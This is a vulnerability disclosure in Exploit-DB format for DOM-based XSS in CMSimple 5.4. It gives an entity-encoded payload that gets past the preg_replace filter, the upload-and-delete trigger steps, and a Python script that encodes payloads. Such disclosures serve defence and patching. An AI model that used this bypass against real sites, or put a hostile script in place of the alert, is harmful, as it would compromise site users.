CMSimple 5.4 - Cross Site Scripting (XSS)

vendor:

CMSimple

by:

heinjame

6.1

CVSS

MEDIUM

Cross Site Scripting (XSS)

CWE

Product Name: CMSimple

Affected Version From: <=5.4

Affected Version To: <=5.4

Patch Exists: YES

Related CWE:

CPE: a:cmsimple:cmsimple:5.4

Metasploit:

Other Scripts:

Platforms Tested: Linux os

2021

CMSimple 5.4 – Cross Site Scripting (XSS)

Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding. So the application let's attacker perform DOM based XSS.

Mitigation:

Upgrade to the latest version of CMSimple.

Source

Exploit-DB raw data:

# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)
# Date: 22/10/2021
# Exploit Author: heinjame
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/?Downloads
# Version: <=5.4
# Tested on: Linux os

[Description]

Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding.

So the application let's attacker perform DOM based XSS.

[Payload and POC]

File > images > Upload a file

Attack vector >> ')-alert(1)// (need to encode)>>
&#39;&#41;&#45;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#47;&#47;

When the victim clicks the delete button,an alert will be executed.

Script to encode the payload

payload = input()
finalpayload = ""
for i in payload:
	finalpayload = finalpayload + "&#" + str(ord(i)) + ";"
print(finalpayload)